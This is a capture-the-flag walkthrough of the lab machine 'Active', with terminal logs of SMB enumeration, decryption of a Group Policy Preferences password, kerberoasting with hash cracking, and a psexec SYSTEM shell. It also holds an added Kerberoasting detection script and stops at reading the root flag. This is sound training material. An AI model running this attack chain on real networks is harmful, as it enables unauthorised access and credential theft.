Active

Tools

  • smbmap
  • smbclient
  • gpp-decrypt
  • impacket-GetUserSPNs
  • impacket-psexec

Getting User

Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV 10.129.7.159
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-06 14:09 EST
Nmap scan report for 10.129.7.159
Host is up (0.24s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-06 19:14:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 314.75 seconds

Foothold

added the domain from the LDAP banner (active.htb) to /etc/hosts

echo '10.129.7.159 active.htb' | sudo tee -a /etc/hosts 

used smbmap to enumerate shares

┌──(kali㉿kali)-[~]
└─$ smbmap -H active.htb

-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.129.7.159:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections

then connected anonymously to the Replication share, the only one with READ ONLY access, to look for something useful

smbclient //active.htb/Replication -N

looking through the folders manually was slow, so i used smbmap to list the Replication share recursively (depth 20) instead

smbmap -H active.htb -r Replication --depth 20

and found this xml under the Group Policy Preferences folder of the default domain policy

./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml

connected with smbclient to download the file

┌──(kali㉿kali)-[~/htb/active]
└─$ smbclient //active.htb/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>

the file defines a local user (SVC_TGS) and carries its password in the cpassword attribute

┌──(kali㉿kali)-[~/htb/active]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

the cpassword is a classic Group Policy Preferences password: AES-256 encrypted with a static key that Microsoft published in the MS-GPPREF specification, so anyone who can read SYSVOL can decrypt it

┌──(kali㉿kali)-[~/htb/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

so the credentials are active.htb\SVC_TGS:GPPstillStandingStrong2k18

used smbmap to enumerate again with these credentials, and Users and SYSVOL are now accessible

┌──(kali㉿kali)-[~/htb/active]
└─$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb

-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.129.7.159:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
[*] Closed 1 connections

the user flag can now be retrieved from SVC_TGS's desktop through the Users share

┌──(kali㉿kali)-[~/htb/active]
└─$ smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //active.htb/Users -L
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 278873 blocks available
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Fri Feb 6 13:56:16 2026

5217023 blocks of size 4096. 278873 blocks available

Getting Root

Information Gathering

so i tried impacket-GetUserSPNs to find domain accounts with an SPN set and request a kerberos service ticket for them (kerberoasting)

┌──(kali㉿kali)-[~/htb/active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip active.htb -request

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2026-02-06 13:56:18.323742



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b941a5da384234be6cf4ea76bf26b208$[...]

Privilege Escalation

then ran the same command again, redirecting the output to a file

impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip active.htb -request > tgs.txt

i can now crack the ticket hash with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23)

hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt

the cracked password is Ticketmaster1968
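Added example, not part of the original writeup: the defender's view of the step above. GetUserSPNs -request asks the DC for RC4-HMAC service tickets (etype 0x17, which is what the $krb5tgs$23$ prefix encodes), and each request is logged as Security event 4769. The rule below flags RC4 tickets for user-owned SPNs and groups them by requesting account and source IP; the events are constructed samples already reduced to dicts keyed by the 4769 EventData field names.

```python
from collections import Counter

# Constructed sample 4769 records (fields as they appear in the event's EventData).
SAMPLE_4769 = [
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.129.7.159"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x17", "IpAddress": "10.129.7.20"},
]

RC4_ETYPES = {"0x17", "0x18"}  # rc4-hmac and rc4-hmac-exp


def is_roast_candidate(ev):
    """True when a service ticket for a user-owned SPN was issued with RC4."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # machine accounts and the KDC itself are not roastable
    return ev["TicketEncryptionType"].lower() in RC4_ETYPES


def kerberoast_alerts(events, threshold=1):
    """Group suspicious 4769s by (requesting account, source IP).

    Returns (account, ip, count, sorted service names) for every group at or
    above threshold. In a real domain raise threshold, or add a time window,
    so that a single legacy RC4 service does not page anyone."""
    counts = Counter()
    targets = {}
    for ev in events:
        if is_roast_candidate(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            counts[key] += 1
            targets.setdefault(key, set()).add(ev["ServiceName"])
    return [(user, ip, n, sorted(targets[(user, ip)]))
            for (user, ip), n in counts.items() if n >= threshold]


if __name__ == "__main__":
    for user, ip, n, services in kerberoast_alerts(SAMPLE_4769):
        print(f"[!] {user} from {ip} requested {n} RC4 ticket(s) for {services}")
```

Setting the service account to AES-only (msDS-SupportedEncryptionTypes) removes the 0x17 tickets altogether and makes the offline crack far more expensive, which is the fix rather than the alert.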

i tried to log in with evil-winrm but it didn't work (WinRM on 5985 is not among the open ports in the scan above)

next, i tried impacket-psexec, which gave me a SYSTEM shell

┌──(kali㉿kali)-[~/htb/active]
└─$ impacket-psexec active.htb/Administrator:'Ticketmaster1968'@active.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mHNmArAh.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service iDnx on active.htb.....
[*] Starting service iDnx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Directory of C:\Users\Administrator\Desktop
06/02/2026 08:56 34 root.txt

1 File(s) 34 bytes
2 Dir(s) 1.142.329.344 bytes free

C:\Users\Administrator\Desktop> type root.txt